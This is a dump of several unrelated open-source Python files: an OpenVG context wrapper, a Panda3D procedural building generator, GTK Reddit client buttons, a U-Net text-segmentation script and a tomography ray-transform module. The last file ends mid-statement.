array = (c_itemtype * size)(*val)
setv_fn(param_id, size, array)
return setter
def _get(param, name, values, type_=int, from_nt=None):
'''Create a read-only property with a scalar value.
Keyword arguments:
param -- A key from _params identifying the context parameter.
name -- A human-readable name for the property.
values -- A human-readable description of the values this
property can have. Ignored if type_ is bool.
type_ -- The type of this property. OpenVG only directly allows
integer or floating-point parameters, although it also has
boolean parameters represented by integers. If this argument
is set to something other than float, OpenVG will provide an
integer which will then be converted to the supplied type.
If omitted, the default is int.
from_nt -- An optional named tuple instance from which values
must be drawn.
'''
# TODO: Do something useful with from_nt.
param_id = _params[param]
get_fn = (vgGetf if type_ is float else vgGeti)
docstring = ('Whether or not {} (read-only).\n'.format(name)
if type_ is bool else
'The {} (read-only).\n\n Possible values are '
'{}.\n'.format(name, values))
return property(fget=lambda self: type_(get_fn(param_id)),
doc=docstring)
def _getv(param, name, values, type_=int, flattened=False, known_size=None):
'''Create a read-only property with a vector value.
Keyword arguments:
param -- A key from _params identifying the context parameter.
name -- A human-readable name for the property.
values -- A human-readable description of the values this
property can have.
type_ -- The data type stored in this vector. OpenVG only
directly allows integer or floating-point parameters. (It
also has boolean parameters, represented by integers, but no
parameter is currently defined as a vector of booleans.) If
this argument is set to something other than float, OpenVG
will provide an integer which will then be converted to the
supplied type. If omitted, the default is int.
flattened -- Whether or not the property is a sequence of
vectors that needs to be "unflattened" after reading. If
omitted, the default is False. If True, known_size must be
specified.
known_size -- The fixed size of this vector, if it has one. If
omitted or None, the vector will be dynamically sized each
time it is read. If flattened is True, this parameter is
required, and specifies the size of each vector in the
sequence, not of the sequence itself.
'''
param_id = _params[param]
return property(fget=lambda self: _get_vector(param_id, type_, flattened,
known_size),
doc=('The {} (read-only).\n\n'
' Possible values are {}.\n'.format(name, values)))
def _getset(param, name, values, type_=int, from_nt=None):
'''Create a read/write property with a scalar value.
Keyword arguments:
param -- A key from _params identifying the context parameter.
name -- A human-readable name for the property.
values -- A human-readable description of the values this
property can take.
type_ -- The type of this property. OpenVG only directly allows
integer or floating-point parameters, although it also has
boolean parameters represented by integers. If this argument
is set to something other than float, OpenVG will provide an
integer which will then be converted to the supplied type.
If omitted, the default is int.
from_nt -- An optional named tuple instance from which values
must be drawn.
'''
# TODO: Do something useful with from_nt.
param_id = _params[param]
(get_fn, set_fn, c_type) = ((vgGetf, vgSetf, c_float) if type_ is float
else (vgGeti, vgSeti, c_int))
docstring = ('Whether or not {}.\n'.format(name) if type_ is bool else
'The {}.\n\n Legal values are {}.\n'.format(name, values))
return property(fget=lambda self: type_(get_fn(param_id)),
fset=lambda self, val: set_fn(param_id, c_type(val)),
doc=docstring)
def _getsetv(param, name, values, type_=int, flattened=False, known_size=None):
'''Create a read/write property with a vector value.
Keyword arguments:
param -- A key from _params identifying the context parameter.
name -- A human-readable name for the property.
values -- A human-readable description of the values this
property can take.
type_ -- The type of this property. OpenVG only directly allows
integer or floating-point parameters. (It also has boolean
parameters represented by integers, but currently no vectors
of booleans). If this argument is set to something other
than float, OpenVG will provide an integer which will then
be converted to the supplied type. If omitted, the default
is int.
flattened -- Whether or not the property is a sequence of
vectors that needs to be flattened on write and restored on
read. If omitted, the default is False.
known_size -- The known size of the vector values of this
property. If omitted or None, the size will be checked on
each read and write. If flattened is True, this parameter is
required, and specifies the size of each vector in the
sequence, not of the sequence itself.
'''
param_id = _params[param]
return property(fget=_get_vector(param_id, type_, flattened, known_size),
fset=_set_vector(param_id, type_, flattened, known_size),
doc=('The {}.\n\n'
' Legal values are {}.\n'.format(name, values)))
# The OpenVG context itself.
class Context:
'''Represents the OpenVG context.
Because of the design of OpenVG, instances of this class will all
access the same context state. It is therefore not generally useful
to have more than one Context instance in use.
Context attributes:
matrix_mode
fill_rule
image_quality
rendering_quality
blend_mode
image_mode
scissor_rects
color_transform
color_transform_values
stroke_line_width
stroke_cap_style
stroke_join_style
stroke_miter_limit
stroke_dash_pattern
stroke_dash_phase
stroke_dash_phase_reset
tile_fill_color
clear_color
glyph_origin
masking
scissoring
screen_layout
pixel_layout
filter_format_linear
filter_format_premultiplied
filter_channel_mask
Read-only context attributes:
max_scissor_rects
max_dash_count
max_kernel_size
max_separable_kernel_size
max_gaussian_std_deviation
max_color_ramp_stops
max_image_width
max_image_height
max_image_pixels
max_image_bytes
max_float
'''
# Mode settings
matrix_mode = _getset('MATRIX_MODE', 'transform matrix mode',
'contained in the MatrixMode named tuple',
from_nt=MatrixMode)
fill_rule = _getset('FILL_RULE', 'path fill rule',
'contained in the FillRule named tuple',
from_nt=FillRule)
image_quality = _getset('IMAGE_QUALITY', 'image resampling quality',
'contained in the ImageQuality named tuple',
from_nt=ImageQuality)
rendering_quality = _getset('RENDERING_QUALITY',
'overall rendering quality',
'contained in the RenderingQuality '
'named tuple', from_nt=RenderingQuality)
blend_mode = _getset('BLEND_MODE', 'blending mode (from a subset of '
'Porter-Duff modes, plus some extras) to apply',
'contained in the BlendMode named tuple',
from_nt=BlendMode)
image_mode = _getset('IMAGE_MODE', 'image drawing method',
'contained in the ImageMode named tuple',
from_nt=ImageMode)
# Alpha masking and scissoring
masking = _getset('MASKING', 'masking is active',
'booleans', type_=bool)
scissoring = _getset('SCISSORING', 'scissoring is active',
'booleans', type_=bool)
scissor_rects = _getsetv('SCISSOR_RECTS', 'scissoring rectangles, which '
'bound the drawing surface when scissoring is '
'enabled',
'4-tuples of (x, y, width, height) for each '
'scissoring rectangle',
flattened=True, known_size=4)
# Colour transformation
# TODO: One property for both of these.
color_transform = _getset('COLOR_TRANSFORM',
'colour transformation is active',
'booleans', type_=bool)
color_transform_values = _getsetv('COLOR_TRANSFORM_VALUES', 'parameters '
'of the colour transformation',
'eight color components (red, green, '
'blue, alpha for scale and for bias)',
type_=float, known_size=8)
# Stroke parameters
# TODO: One property for all stroke parameters.
stroke_line_width = _getset('STROKE_LINE_WIDTH', 'width of the stroke',
'non-negative floats', type_=float)
stroke_cap_style = _getset('STROKE_CAP_STYLE', 'style of the stroke ends',
'contained in the CapStyle named tuple',
from_nt=CapStyle)
stroke_join_style = _getset('STROKE_JOIN_STYLE', 'style of stroke joins',
'contained in the JoinStyle named tuple',
from_nt=JoinStyle)
stroke_miter_limit = _getset('STROKE_MITER_LIMIT', 'miter length limit, '
'past which miter joins are converted to '
'bevel joins',
'non-negative floats', type_=float)
# Stroke dash parameters
# TODO: One property for all dash parameters.
stroke_dash_pattern = _getsetv('STROKE_DASH_PATTERN', 'series of "on" '
'and "off" lengths in the dash pattern',
'sequences of even numbers of floats (an '
'empty sequence disables dashes)',
type_=float)
stroke_dash_phase = _getset('STROKE_DASH_PHASE', 'offset before the dash '
'pattern begins', 'floats', type_=float)
stroke_dash_phase_reset = _getset('STROKE_DASH_PHASE_RESET',
'reset the dash pattern on each subpath',
'booleans', type_=bool)
# Fill and clear colours
tile_fill_color = _getsetv('TILE_FILL_COLOR', 'fill colour used for the '
'TILE_FILL tiling mode', '4-tuples of (R, G, B, '
'A) floats in the range [0, 1] (other values '
'will be clamped)', type_=float, known_size=4)
clear_color = _getsetv('CLEAR_COLOR', 'colour used when fast-clearing '
'regions', '4-tuples of (R, G, B, A) floats in the '
'range [0, 1] (other values will be clamped)',
type_=float, known_size=4)
# Glyph origin
glyph_origin = _getsetv('GLYPH_ORIGIN', 'the current position of the '
'glyph "cursor"', '2-tuples of (x, y) floats',
type_=float, known_size=2)
# Pixel layout information
pixel_layout = _getset('PIXEL_LAYOUT', 'pixel geometry hint supplied to '
'the renderer', 'contained in the PixelLayout '
'named tuple', from_nt=PixelLayout)
# This isn't specified as read-only, but the description implies it.
screen_layout = _get('SCREEN_LAYOUT', 'pixel geometry of the current '
'display device', 'contained in the PixelLayout '
'named tuple', from_nt=PixelLayout)
# Filter settings
# TODO: One property for both filter source format conversions.
filter_format_linear = _getset('FILTER_FORMAT_LINEAR', 'filter formats are '
'converted to a linear colour space',
'booleans', type_=bool)
filter_format_premult = _getset('FILTER_FORMAT_PREMULTIPLIED', 'filter '
'formats are converted to a premultiplied '
'colour space', 'booleans', type_=bool)
filter_channel_mask = _getset('FILTER_CHANNEL_MASK', 'colour channels of '
'the filtered image to write', 'bitmasks of '
'red, green, blue and alpha') # TODO: Bitmask!
# Read-only implementation limits
max_scissor_rects = _get('MAX_SCISSOR_RECTS', 'maximum number of '
'scissoring rectangles supported',
'positive integers (minimum 32)')
max_dash_count = _get('MAX_DASH_COUNT', 'maximum number of dash segments '
'that may be specified',
'positive integers (minimum 16)')
max_kernel_size = _get('MAX_KERNEL_SIZE', 'maximum kernel size (width '
'and/or height) for convolution',
'positive integers (minimum 7)')
max_separable_kernel_size = _get('MAX_SEPARABLE_KERNEL_SIZE', 'maximum '
'kernel size for separable convolution',
'positive integers (minimum 15)')
max_color_ramp_stops = _get('MAX_COLOR_RAMP_STOPS', 'maximum number of '
'gradient stops that may be specified',
'positive integers (minimum 32)')
max_image_width = _get('MAX_IMAGE_WIDTH', 'maximum pixel width of images '
'and masks', 'positive integers (minimum 256)')
max_image_height = _get('MAX_IMAGE_HEIGHT', 'maximum pixel height of '
'images and masks',
'positive integers (minimum 256)')
max_image_pixels = _get('MAX_IMAGE_PIXELS', 'maximum number of pixels in '
'an image or mask',
'positive integers (minimum 65536)')
max_image_bytes = _get('MAX_IMAGE_BYTES', 'maximum bytes of image data in '
'an image', 'positive integers (minimum 65536)')
max_float = _get('MAX_FLOAT', 'largest floating-point number accepted by '
'this implementation', 'positive floating-point numbers '
'(minimum 1E+10)', type_=float)
max_gaussian_std_deviation = _get('MAX_GAUSSIAN_STD_DEVIATION',
'largest standard deviation accepted '
'for Gaussian blur',
'positive floating-point numbers '
'(minimum 16.0)',
type_=float)
@staticmethod
def flush():
'''Force operations on the current context to finish.
Calling this function will ensure that any outstanding operations
will finish in finite time, but it will not block while waiting
for completion of those operations.
'''
vgFlush()
@staticmethod
def finish():
'''Force operations on the current context to finish.
When called, this function will not return until all outstanding
operations are complete.
'''
vgFinish()
|
perey/povg
|
povg/context/__init__.py
|
Python
|
gpl-3.0
| 25,961
|
from panda3d.core import (
Geom,
GeomNode,
GeomTristrips,
GeomVertexFormat,
GeomVertexData,
GeomVertexWriter,
Vec3,
)
from utils import center, lerp
class Level:
def __init__(self, border, top, cover=True):
self.fmt = GeomVertexFormat.getV3c4()
self.border = border
self.top = top
self.cover = cover
def primitives(self, vdata):
vertex = GeomVertexWriter(vdata, 'vertex')
color = GeomVertexWriter(vdata, 'color')
n = len(self.border)
# Points
for p in self.border:
vertex.addData3f(p.x, p.y, p.z)
color.addData4f(0.5, 0.5, 0.5, 0.0)
for p in self.border:
vertex.addData3f(p.x, p.y, p.z + self.top)
color.addData4f(1.0, 1.0, 1.0, 0.0)
# Wall
wall = GeomTristrips(Geom.UHStatic)
for i in range(n):
wall.addVertices(i, i + n)
wall.addVertices(0, n)
wall.closePrimitive()
yield wall
# Ceiling
if self.cover:
ceil = GeomTristrips(Geom.UHStatic)
ceil.addConsecutiveVertices(n, n)
ceil.addVertex(n)
ceil.closePrimitive()
yield ceil
def geom(self):
vdata = GeomVertexData('LevelVD', self.fmt, Geom.UHStatic)
geom = Geom(vdata)
for primitive in self.primitives(vdata):
geom.addPrimitive(primitive)
return geom
def node(self):
node = GeomNode('LevelNode')
node.addGeom(self.geom())
return node
class Building:
def __init__(self, border, tops):
self.border = border
self.tops = tops
self.levels = []
n = len(tops)
for i in range(n):
border = [Vec3(p.x, p.y, p.z + i * 2.5) for p in self.border]
c = center(border)
border = [lerp(p, c, 1 - 0.99 ** i) for p in border]
top = (i + 1) * 2.5
level = Level(border=border, top=top, cover=True)
self.levels.append(level)
def node(self):
node = GeomNode('BuildingNode')
for level in self.levels:
node.addGeom(level.geom())
return node
|
Alkxzv/procedural-city
|
buildings.py
|
Python
|
gpl-3.0
| 2,213
|
# Copyright 2016 Sam Parkinson <sam@sam.today>
#
# This file is part of Something for Reddit.
#
# Something for Reddit is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Something for Reddit is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Something for Reddit. If not, see <http://www.gnu.org/licenses/>.
import arrow
from gi.repository import Gtk
from gi.repository import Pango
from redditisgtk.palettebutton import connect_palette
from redditisgtk.api import RedditAPI
'''
So you come here and you ask, why are these ButtonBehaviours rather
than simple Gtk.Button subclasses? The answer is simple: we make
the uis via Gtk.Builder, and I can't seem to get Gtk.Builder.expose_object
to work from python. Also, if we use custom widgets, it will annoy
Glade probably.
'''
def make_label_shrinkable(label: Gtk.Label):
'''
Make a label shrinkable in the most aggressive way possible
'''
label.props.ellipsize = Pango.EllipsizeMode.END
class ScoreButtonBehaviour():
def __init__(self, api: RedditAPI, button, data):
self._api = api
self._button = button
self._data = data
self._p = connect_palette(button, self._make_score_palette)
self._update_score_button()
def _make_score_palette(self):
bb = Gtk.ButtonBox(orientation=Gtk.Orientation.VERTICAL,
layout_style=Gtk.ButtonBoxStyle.EXPAND)
upvote = Gtk.RadioToolButton(icon_name='reddit-upvote-symbolic')
upvote.get_style_context().add_class('upvote')
bb.add(upvote)
novote = Gtk.RadioToolButton(icon_name='reddit-novote-symbolic',
group=upvote)
bb.add(novote)
downvote = Gtk.RadioToolButton(icon_name='reddit-downvote-symbolic',
group=upvote)
downvote.get_style_context().add_class('downvote')
bb.add(downvote)
bb.show_all()
if self._data.get('likes') is True:
upvote.props.active = True
elif self._data.get('likes') is False:
downvote.props.active = True
else:
novote.props.active = True
upvote.connect('toggled', self.__vote_toggled_cb, +1)
novote.connect('toggled', self.__vote_toggled_cb, 0)
downvote.connect('toggled', self.__vote_toggled_cb, -1)
palette = Gtk.Popover()
palette.add(bb)
return palette
def vote(self, direction):
self._api.vote(self._data['name'], direction)
new_score = self._data['score'] + direction
if self._data['likes'] is True:
new_score -= 1 # Undo the previous like
elif self._data['likes'] is False:
new_score += 1
if direction == 0:
likes = None
elif direction == +1:
likes = True
elif direction == -1:
likes = False
self._data['likes'] = likes
self._data['score'] = new_score
self._update_score_button()
def __vote_toggled_cb(self, toggle, direction):
if toggle.props.active:
self.vote(direction)
def _update_score_button(self):
score = self._data['score']
likes = self._data['likes']
hidden = self._data.get('score_hidden')
score_string = 'score hidden' if hidden else '{}p'.format(score)
self._button.props.label = score_string
ctx = self._button.get_style_context()
ctx.remove_class('upvoted')
ctx.remove_class('downvoted')
if likes is True:
ctx.add_class('upvoted')
elif likes is False:
ctx.add_class('downvoted')
make_label_shrinkable(self._button.get_child())
if self._data.get('gilded') > 0:
gold = '★{} '.format(self._data.get('gilded'))
gold_label = Gtk.Label(label=gold)
gold_label.get_style_context().add_class('gilded')
make_label_shrinkable(gold_label)
label = self._button.get_child()
self._button.remove(label)
box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
box.add(gold_label)
box.add(label)
self._button.add(box)
box.show_all()
class AuthorButtonBehaviour():
def __init__(self, button, data, original_poster=None,
show_flair=False):
button.props.label = data['author']
button.connect('clicked', self.__name_clicked_cb)
disti = data['distinguished']
is_op = data['author'] == original_poster
flair = data['author_flair_text'] if show_flair else None
make_label_shrinkable(button.get_child())
if disti is not None or is_op or flair is not None:
label = button.get_child()
button.remove(label)
box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
if disti is not None:
l = Gtk.Label()
l.props.label = {
'moderator': 'MOD',
'admin': 'ADM',
'special': 'SP'
}[disti]
l.get_style_context().add_class(disti)
make_label_shrinkable(l)
box.add(l)
if is_op:
l = Gtk.Label(label='OP')
l.get_style_context().add_class('op')
make_label_shrinkable(l)
box.add(l)
box.add(label)
if flair is not None:
l = Gtk.Label(label=flair)
l.get_style_context().add_class('flair')
make_label_shrinkable(l)
box.add(l)
button.add(box)
box.show_all()
def __name_clicked_cb(self, button):
window = button.get_toplevel()
window.goto_sublist('/u/{}/'.format(button.props.label))
class SubButtonBehaviour():
def __init__(self, button, data):
button.props.label = data['subreddit']
button.connect('clicked', self.__sub_clicked_cb)
make_label_shrinkable(button.get_child())
def __sub_clicked_cb(self, button):
window = button.get_toplevel()
window.goto_sublist('/r/{}'.format(button.props.label))
class TimeButtonBehaviour():
def __init__(self, button, data):
self.data = data
time = arrow.get(self.data['created_utc'])
button.props.label = time.humanize()
self._p = connect_palette(button, self._make_time_palette,
modalify=True)
make_label_shrinkable(button.get_child())
def _make_time_palette(self):
t = _TimePalette(self.data)
t.get_child().show_all()
return t
class _TimePalette(Gtk.Popover):
def __init__(self, data, **kwargs):
Gtk.Popover.__init__(self, **kwargs)
box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self.add(box)
box.show()
created = arrow.get(data['created_utc'])
lines = ['Created {} ({})'.format(
created.format('hh:mm a, MMM YY'), created.humanize())]
if data.get('edited') is True:
lines.append('Edited ages ago')
elif data.get('edited'):
edited = arrow.get(data['edited'])
lines.append('Edited {} ({})'.format(
edited.format('hh:mm a, MMM YY'), edited.humanize()))
label = Gtk.Label(label='\n'.join(lines))
box.add(label)
label.show()
if data.get('permalink') is not None:
uri = data['permalink']
elif data.get('link_id') is not None:
uri = '/r/{}/comments/{}//{}'.format(
data['subreddit'], data['link_id'][len('t3_'):], data['id'])
else:
uri = '/r/{}/comments/{}'.format(
data['subreddit'], data['id'])
lb = Gtk.LinkButton(uri='https://www.reddit.com' + uri,
label='Permalink in External Browser')
box.add(lb)
lb.show()
class SubscribeButtonBehaviour():
def __init__(self, api: RedditAPI, button, subreddit_name):
self._api = api
self._button = button
self._subreddit_name = subreddit_name
self._button.props.active = \
'/r/{}/'.format(subreddit_name.lower()) \
in self._api.lower_user_subs
self._button.connect('toggled', self.__toggled_cb)
self._set_label()
def _set_label(self):
self._button.props.label = 'Subscribed' \
if self._button.props.active else 'Subscribe'
make_label_shrinkable(self._button.get_child())
def __toggled_cb(self, toggle):
self._button.props.label = 'Subscribing...' \
if self._button.props.active else 'Unsubscribing...'
self._button.props.sensitive = False
self._api.set_subscribed(self._subreddit_name,
self._button.props.active,
self.__subscribe_cb)
def __subscribe_cb(self, j):
self._button.props.sensitive = True
self._set_label()
self._api.update_subscriptions()
|
samdroid-apps/something-for-reddit
|
redditisgtk/buttons.py
|
Python
|
gpl-3.0
| 9,564
|
from ImportModel import load_unet
import numpy as np
from PIL import Image
from os.path import join
import matplotlib.pyplot as plt
import cv2
dim = 512
unet = load_unet(input_shape=(dim, dim, 3), weight_path='text_segmentation.h5')
def segment_im(im, dim=dim):
def postprocess(im):
im[im < 0.1] = 0
im[im > 0.1] = 1
im = np.abs(im - 1) * 255
im = im.astype('uint8')
kernel = np.ones((10, 10), np.uint8)
im = cv2.morphologyEx(im, cv2.MORPH_OPEN, kernel)
return im
width, height = im.shape[:2]
new_im = np.zeros(((width // dim + 1) * dim, (height // dim + 1) * dim, 3))
new_im[:width, :height] = im / 128 - 1
segmentation = np.zeros((new_im.shape[0], new_im.shape[1], 1))
for i in range(new_im.shape[0] // dim):
for j in range(new_im.shape[1] // dim):
i_slice = slice(i * dim, (i + 1) * dim)
j_slice = slice(j * dim, (j + 1) * dim)
sample = np.expand_dims(new_im[i_slice, j_slice], axis=0)
segmentation[i_slice, j_slice] = unet.predict(sample)[0]
segmentation = postprocess(segmentation)
return segmentation, ((new_im+1)*128).astype('uint8')
def get_components(im, segmented):
components = cv2.connectedComponentsWithStats
num_labels, labels, stats, centroids = components(segmented, 4, cv2.CV_8U)
thumbs = []
for left, top, width, height, area in stats[1:]:
thumbs.append(im[top:top+height, left:left+width])
return thumbs
if __name__ == '__main__':
im = np.array(Image.open(join('data', 'x', 'plouzane_1.jpg')))
segmented, new_im = segment_im(im)
thumbs = get_components(new_im, segmented)
print('number of thumbs', len(thumbs))
for i, thumb in enumerate(thumbs):
thumb = Image.fromarray(thumb)
thumb.save(join('data', 'thumbs', f'{i}.png'))
plt.subplot(1, 2, 1)
plt.imshow(im)
plt.subplot(1, 2, 2)
plt.imshow(segmented, cmap="gray")
plt.show()
|
Rignak/Scripts-Python
|
DeepLearning/_Others/OCR/in2thumb.py
|
Python
|
gpl-3.0
| 1,989
|
# Copyright 2014-2016 The ODL development group
#
# This file is part of ODL.
#
# ODL is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ODL is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ODL. If not, see <http://www.gnu.org/licenses/>.
"""Ray transforms."""
# Imports for common Python 2/3 codebase
from __future__ import print_function, division, absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import str, super
import numpy as np
from odl.discr import DiscreteLp
from odl.operator import Operator
from odl.space import FunctionSpace
from odl.tomo.geometry import Geometry, Parallel2dGeometry
from odl.tomo.backends import (
ASTRA_AVAILABLE, ASTRA_CUDA_AVAILABLE, SCIKIT_IMAGE_AVAILABLE,
astra_cpu_forward_projector, astra_cpu_back_projector,
AstraCudaProjectorImpl, AstraCudaBackProjectorImpl,
scikit_radon_forward, scikit_radon_back_projector)
_SUPPORTED_IMPL = ('astra_cpu', 'astra_cuda', 'scikit')
__all__ = ('RayTransform', 'RayBackProjection')
# TODO: DivergentBeamTransform?
class RayTransform(Operator):
"""Discrete Ray transform between L^p spaces."""
def __init__(self, discr_domain, geometry, **kwargs):
"""Initialize a new instance.
Parameters
----------
discr_domain : `DiscreteLp`
Discretized space, the domain of the forward projector
geometry : `Geometry`
Geometry of the transform, containing information about
the operator range
Other Parameters
----------------
impl : {`None`, 'astra_cuda', 'astra_cpu', 'scikit'}, optional
Implementation back-end for the transform. Supported back-ends:
* ``'astra_cuda'``: ASTRA toolbox, using CUDA, 2D or 3D
* ``'astra_cpu'``: ASTRA toolbox using CPU, only 2D
* ``'scikit'``: scikit-image, only 2D parallel with square domain
If ``None`` is given, the fastest available back-end is used.
interp : {'nearest', 'linear'}
Interpolation type for the discretization of the operator
range.
Default: 'nearest'
discr_range : `DiscreteLp`
Discretized space, the range of the forward projector.
Default: Infered from parameters.
use_cache : bool
If ``True``, data is cached. Note that this causes notable memory
overhead, both on the GPU and on the CPU since a full volume and
projection is stored. In the 3D case, some users may want to
disable this.
Default: True
Notes
-----
The ASTRA backend is faster if data is given with ``dtype`` 'float32'
and storage order 'C'. Otherwise copies will be needed.
"""
if not isinstance(discr_domain, DiscreteLp):
raise TypeError('`discr_domain` {!r} is not a `DiscreteLp`'
' instance'.format(discr_domain))
if not isinstance(geometry, Geometry):
raise TypeError('`geometry` {!r} is not a `Geometry` instance'
''.format(geometry))
impl = kwargs.pop('impl', None)
if impl is None:
# Select fastest available
if ASTRA_CUDA_AVAILABLE:
impl = 'astra_cuda'
elif ASTRA_AVAILABLE:
impl = 'astra_cpu'
elif SCIKIT_IMAGE_AVAILABLE:
impl = 'scikit'
else:
raise ValueError('no valid `impl` installed')
impl, impl_in = str(impl).lower(), impl
if impl not in _SUPPORTED_IMPL:
raise ValueError('`impl` {!r} not supported'
''.format(impl_in))
self.use_cache = kwargs.pop('use_cache', True)
# TODO: sanity checks between impl and discretization impl
if impl.startswith('astra'):
# TODO: these should be moved somewhere else
if not ASTRA_AVAILABLE:
raise ValueError("'astra' back-end not available")
if impl == 'astra_cuda' and not ASTRA_CUDA_AVAILABLE:
raise ValueError("'astra_cuda' back-end not available")
if not np.allclose(discr_domain.partition.cell_sides[1:],
discr_domain.partition.cell_sides[:-1]):
raise ValueError('ASTRA does not support different voxel '
'sizes per axis, got {}'
''.format(discr_domain.partition.cell_sides))
if geometry.ndim > 2 and impl.endswith('cpu'):
raise ValueError('`impl` {}, only works for 2d geometries'
' got {}-d'.format(impl_in, geometry))
elif impl == 'scikit':
if not isinstance(geometry, Parallel2dGeometry):
raise TypeError("'scikit' backend only supports 2d parallel "
'geometries')
mid_pt = discr_domain.domain.mid_pt
if not all(mid_pt == [0, 0]):
raise ValueError('`discr_domain.domain` needs to be '
'centered on [0, 0], got {}'.format(mid_pt))
shape = discr_domain.shape
if shape[0] != shape[1]:
raise ValueError('`discr_domain.shape` needs to be square '
'got {}'.format(shape))
extent = discr_domain.domain.extent()
if extent[0] != extent[1]:
raise ValueError('`discr_domain.extent` needs to be square '
'got {}'.format(extent))
# TODO: sanity checks between domain and geometry (ndim, ...)
self.__geometry = geometry
self.__impl = impl
self.kwargs = kwargs
discr_range = kwargs.pop('discr_range', None)
if discr_range is None:
dtype = discr_domain.dspace.dtype
# Create a discretized space (operator range) with the same
# data-space type as the domain.
# TODO: use a ProductSpace structure or find a way to treat
# different dimensions differently in DiscreteLp
# (i.e. in partitions).
range_uspace = FunctionSpace(geometry.params,
out_dtype=dtype)
# Approximate cell volume
# TODO: angles and detector must be handled separately. While the
# detector should be uniformly discretized, the angles do not have
# to and often are not.
extent = float(geometry.partition.extent().prod())
size = float(geometry.partition.size)
weight = extent / size
range_dspace = discr_domain.dspace_type(geometry.partition.size,
weighting=weight,
dtype=dtype)
if geometry.ndim == 2:
axis_labels = ['$\\theta$', '$s$']
elif geometry.ndim == 3:
axis_labels = ['$\\theta$', '$u$', '$v$']
else:
# TODO Add this when we add nd ray transform.
axis_labels = None
range_interp = kwargs.get('interp', 'nearest')
discr_range = DiscreteLp(
range_uspace, geometry.partition, range_dspace,
interp=range_interp, order=discr_domain.order,
axis_labels=axis_labels)
self.backproj = None
super().__init__(discr_domain, discr_range, linear=True)
@property
def impl(self):
"""Implementation back-end for evaluation of this operator."""
return self.__impl
@property
def geometry(self):
"""Geometry of this operator."""
return self.__geometry
def _call(self, x, out=None):
"""Forward project ``x`` and store the result in ``out`` if given."""
if self.impl.startswith('astra'):
backend, data_impl = self.impl.split('_')
if data_impl == 'cpu':
return astra_cpu_forward_projector(x, self.geometry,
self.range, out)
elif data_impl == 'cuda':
proj = getattr(self, 'astra_projector', None)
if proj is None:
self.astra_projector = AstraCudaProjectorImpl(
self.geometry, self.domain, self.range,
use_cache=self.use_cache)
return self.astra_projector.call_forward(x, out)
else:
# Should never happen
raise RuntimeError('implementation info is inconsistent')
elif self.impl == 'scikit':
return scikit_radon_forward(x, self.geometry, self.range, out)
else: # Should never happen
raise RuntimeError('implementation info is inconsistent')
@property
def adjoint(self):
"""Adjoint of this operator.
Returns
-------
adjoint : `RayBackProjection`
"""
if self.backproj is not None:
return self.backproj
kwargs = self.kwargs.copy()
kwargs['discr_domain'] = self.range
self.backproj = RayBackProjection(self.domain, self.geometry,
impl=self.impl,
use_cache=self.use_cache,
**kwargs)
return self.backproj
class RayBackProjection(Operator):
"""Adjoint of the discrete Ray transform between L^p spaces."""
def __init__(self, discr_range, geometry, **kwargs):
"""Initialize a new instance.
Parameters
----------
discr_range : `DiscreteLp`
Reconstruction space, the range of the back-projector
geometry : `Geometry`
The geometry of the transform, contains information about
the operator domain
Other Parameters
----------------
impl : {'astra_cpu', 'astra_cuda', 'scikit'}, optional
Implementation back-end for the transform. Supported back-ends:
* ``'astra_cuda'``: ASTRA toolbox, using CUDA, 2D or 3D
* ``'astra_cpu'``: ASTRA toolbox using CPU, only 2D
* ``'scikit'``: scikit-image, only 2D parallel with square domain
If ``None`` is given, the fastest available back-end is used.
interp : {'nearest', 'linear'}
Interpolation type for the discretization of the operator range.
Default: 'nearest'
discr_domain : `DiscreteLp`
Discretized space, the range of the forward projector.
Default: Infered from parameters.
use_cache : bool
If ``True``, data is cached. Note that this causes notable memory
overhead, both on the GPU and on the CPU since a full volume and
projection is stored. In the 3D case, some users may want to
disable this.
"""
if not isinstance(discr_range, DiscreteLp):
raise TypeError('`discr_range` {!r} is not a `DiscreteLp`'
' instance'.format(discr_range))
if not isinstance(geometry, Geometry):
raise TypeError('`geometry` {!r} is not a `Geometry` instance'
''.format(geometry))
impl = kwargs.pop('impl', None)
if impl is None:
# Select fastest available
if ASTRA_CUDA_AVAILABLE:
impl = 'astra_cuda'
elif ASTRA_AVAILABLE:
impl = 'astra_cpu'
elif SCIKIT_IMAGE_AVAILABLE:
impl = 'scikit'
else:
raise ValueError('no valid `impl` installed')
impl, impl_in = str(impl).lower(), impl
if impl not in _SUPPORTED_IMPL:
raise ValueError("`impl` '{}' not supported"
''.format(impl_in))
if impl.startswith('astra'):
if not ASTRA_AVAILABLE:
raise ValueError("'astra' backend not available")
if impl == 'astra_cuda' and not ASTRA_CUDA_AVAILABLE:
raise ValueError("'astra_cuda' backend not available")
if not np.allclose(discr_range.partition.cell_sides[1:],
discr_range.partition.cell_sides[:-1],
atol=0, rtol=1e-5):
raise ValueError('ASTRA does not support different voxel '
'sizes per axis, got {}'
''.format(discr_range.partition.cell_sides))
self.use_cache = kwargs.pop('use_cache', True)
self.__geometry = geometry
self.__impl = impl
self.kwargs = kwargs
discr_domain = kwargs.pop('discr_domain', None)
if discr_domain is None:
dtype = discr_range.dspace.dtype
# Create a discretized space (operator domain) with the same
# data-space type as the range.
domain_uspace = FunctionSpace(geometry.params, out_dtype=dtype)
# Approximate cell volume
extent = float(geometry.partition.extent().prod())
size = float(geometry.partition.size)
weight = extent / size
domain_dspace = discr_range.dspace_type(geometry.partition.size,
weighting=weight,
dtype=dtype)
if geometry.ndim == 2:
axis_labels = ['$\\theta$', '$s$']
elif geometry.ndim == 3:
axis_labels = ['$\\theta$', '$u$', '$v$']
else:
# TODO Add this when we add nd ray transform.
axis_labels = None
domain_interp = kwargs.get('interp', 'nearest')
discr_domain = DiscreteLp(
